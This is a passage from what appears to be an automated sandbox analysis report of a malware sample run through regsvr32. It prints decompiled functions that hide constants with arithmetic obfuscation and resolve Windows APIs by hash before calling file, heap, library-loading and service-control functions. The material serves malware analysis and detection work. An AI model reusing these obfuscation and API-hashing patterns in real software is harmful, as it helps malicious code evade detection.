				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x004bbf24
0x004bbf29
0x004bbf2b
0x004bbf2e
0x004bbf2f
0x004bbf30
0x004bbf33
0x004bbf36
0x004bbf39
0x004bbf3c
0x004bbf3f
0x004bbf42
0x004bbf43
0x004bbf44
0x004bbf49
0x004bbf53
0x004bbf5a
0x004bbf61
0x004bbf68
0x004bbf6c
0x004bbf70
0x004bbf77
0x004bbf7e
0x004bbf85
0x004bbf9c
0x004bbfa4
0x004bbfab
0x004bbfb2
0x004bbfb6
0x004bbfba
0x004bbfbe
0x004bbfd1
0x004bbfe8
0x004bbfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 004BBFE8

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: 9397abbb2b2a88ca41f790eededfcd4cb04369e4e615bf48f9fb59f55245c44d
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: D321057280020DBBCF15DF96C9098DFBFB5FB94748F008198F925A2220D3B68A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004B1B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004B1B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004A9E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E004BBFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x004b1b2a
0x004b1b2d
0x004b1b2f
0x004b1b31
0x004b1b34
0x004b1b37
0x004b1b3a
0x004b1b3b
0x004b1b3c
0x004b1b41
0x004b1b50
0x004b1b54
0x004b1b61
0x004b1b64
0x004b1b6b
0x004b1b72
0x004b1b79
0x004b1b7d
0x004b1b84
0x004b1b8b
0x004b1b92
0x004b1b99
0x004b1ba0
0x004b1ba7
0x004b1bae
0x004b1bc2
0x004b1bc5
0x004b1bd8
0x004b1be5
0x004b1bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 004B1BE5

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: 0cc6c5e04f561017f714e00d6b76b29a76bbb3804375524bb6e89204772736d4
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: 672133B5D01208FBDF05DFA5C94A8EEBFB5FB80314F10808AE814A6261D3B45B41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 004B66C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004B66C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E004A9E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E004BBFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x004b66cf
0x004b66e4
0x004b66e9
0x004b66f3
0x004b66f7
0x004b66fe
0x004b6705
0x004b670c
0x004b6710
0x004b6717
0x004b671e
0x004b6725
0x004b6729
0x004b672d
0x004b6734
0x004b673b
0x004b6742
0x004b6766
0x004b6777
0x004b677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 004B6777

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 533d4d724b0e7a8bba0ad4c3cfcd86ff2136f3ad87137bb1e3cca399437c4571
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: 811144B2800208FBCF15DF95CC0A8DFBFB4EF95308F108198E92962211D3B58A64DB90

Uniqueness

Uniqueness Score: -1.00%

Function 004AFCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004AFCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E004A9E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E004BBFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x004afcbc
0x004afcbf
0x004afcc1
0x004afcc3
0x004afcc8
0x004afcd6
0x004afcdb
0x004afce0
0x004afce7
0x004afcee
0x004afcf5
0x004afcfc
0x004afd03
0x004afd0d
0x004afd13
0x004afd16
0x004afd1d
0x004afd24
0x004afd2b
0x004afd4f
0x004afd58
0x004afd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 004AFD58

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: 62316ccc02743b6f28966d4b7a723a5f2c976c327bbde90ecff307ab766a7ebb
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: 80112E71D01218EBDB18DFA5C84A8EFBBB5EB44308F10818DE429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 004A9EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004A9EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E004A9E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E004BBFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x004a9eaf
0x004a9eb2
0x004a9eb4
0x004a9eb8
0x004a9eb9
0x004a9ebe
0x004a9ec8
0x004a9ecf
0x004a9ed6
0x004a9edd
0x004a9ee1
0x004a9ee5
0x004a9eec
0x004a9ef3
0x004a9efa
0x004a9f01
0x004a9f08
0x004a9f0f
0x004a9f16
0x004a9f1d
0x004a9f24
0x004a9f48
0x004a9f51
0x004a9f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 004A9F51

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: 3b132028f96522aece8bf280e19229a377861b5ccd8f483e6b0b06fda725de0a
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: 551148B1C01219EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7F41B148F95

Uniqueness

Uniqueness Score: -1.00%

Function 004ABA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004ABA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E004BBFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x004abaa2
0x004abaa9
0x004abaad
0x004abab4
0x004ababb
0x004ababf
0x004abac6
0x004abacd
0x004abad4
0x004abadb
0x004abae6
0x004abaee
0x004abaf6
0x004abafa
0x004abb12
0x004abb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 004ABB1D

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: 5dd936348c42105f4257ad9bf0e76fd9260397fd748b2aa16ed468916cacbc34
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: 0C010475D1120CEB8B04DFA5CA4A9DEBBB4FB04348F108599E821B7211D7B55B04CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1968, Parent PID: 1484COMMON

Executed Functions

Function 003232B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E003232B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00329E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E0033BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x003232be
0x003232bf
0x003232c2
0x003232c3
0x003232c8
0x003232cd
0x003232d6
0x003232d9
0x003232dc
0x003232e9
0x003232ec
0x003232f4
0x003232f5
0x003232fa
0x00323304
0x0032330b
0x0032330f
0x00323316
0x0032331d
0x00323324
0x00323335
0x00323338
0x0032333c
0x00323343
0x0032334a
0x00323361
0x00323364
0x00323377
0x00323384
0x0032338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00323384

Strings

w\ y, xrefs: 0032331D

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: ffc9722990ae729a04150f3be000754370a2722fa85d582a6ffb1deb766fe600
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 872123B5D01228FBCB04DFA9D88A9EEBFB5FF40304F208189E424AA250D3B55B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0032C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0032C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00329E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E0033BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x0032c4f2
0x0032c4f5
0x0032c4f7
0x0032c4fa
0x0032c4fd
0x0032c500
0x0032c501
0x0032c502
0x0032c507
0x0032c50e
0x0032c515
0x0032c51c
0x0032c523
0x0032c52a
0x0032c52d
0x0032c531
0x0032c538
0x0032c53f
0x0032c556
0x0032c55e
0x0032c562
0x0032c569
0x0032c570
0x0032c577
0x0032c57e
0x0032c585
0x0032c58c
0x0032c593
0x0032c59a
0x0032c5ad
0x0032c5bc
0x0032c5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0032C5BC

Strings

", xrefs: 0032C577

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: b0f7954585c4809e976528542962ea6fd42d3f9f8e281b341cc71fd4618d8ad3
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: 482120B5C0020DEBCF15DFA4D8499EEBBB4FF04318F108688E9256A260E3B15B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0033A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0033A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00329E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E0033BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x0033a994
0x0033a997
0x0033a99c
0x0033a9a1
0x0033a9a7
0x0033a9ae
0x0033a9b5
0x0033a9c2
0x0033a9c5
0x0033a9c8
0x0033a9cf
0x0033a9db
0x0033a9dc
0x0033a9e1
0x0033a9eb
0x0033a9f2
0x0033a9f9
0x0033aa00
0x0033aa17
0x0033aa1a
0x0033aa2b
0x0033aa2e
0x0033aa41
0x0033aa4c
0x0033aa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0033AA4C

Strings

ijp, xrefs: 0033A9EB

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: 56366c0f30dd1e7babc246606bd7ca0600845cc328a15bb09622258394dfe47d
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: 522117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 0032338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0032338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00329E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E0033BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x00323391
0x00323396
0x0032339b
0x003233a1
0x003233a5
0x003233ac
0x003233b9
0x003233bd
0x003233c0
0x003233c7
0x003233d8
0x003233db
0x003233f2
0x003233f5
0x003233fc
0x00323403
0x0032340a
0x0032340e
0x00323415
0x0032341c
0x00323427
0x0032342a
0x00323431
0x00323444
0x0032344f
0x00323454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0032344F

Strings

|[0, xrefs: 003233FC

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: 4645d084343e787a5abceaa5014ec777cfc603ea90a244e14ab90760af55078b
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 322108B4D01209EFDF04DFA5C94AADEFBB4FF10315F108589E4146A251D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 0033E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0033E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00329E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E0033BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x0033e37a
0x0033e37d
0x0033e37f
0x0033e382
0x0033e384
0x0033e389
0x0033e392
0x0033e399
0x0033e3a0
0x0033e3a7
0x0033e3ae
0x0033e3b5
0x0033e3bc
0x0033e3c3
0x0033e3cf
0x0033e3d5
0x0033e3d8
0x0033e3df
0x0033e3e6
0x0033e3ed
0x0033e3f4
0x0033e40b
0x0033e413
0x0033e426
0x0033e42f
0x0033e435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00333F2A,00000000), ref: 0033E42F

Strings

M8, xrefs: 0033E3ED

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: 7aa6e42c4ac1ad16415096d21dff14f321eb2e8e36394d87f254ba12d7b02e72
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
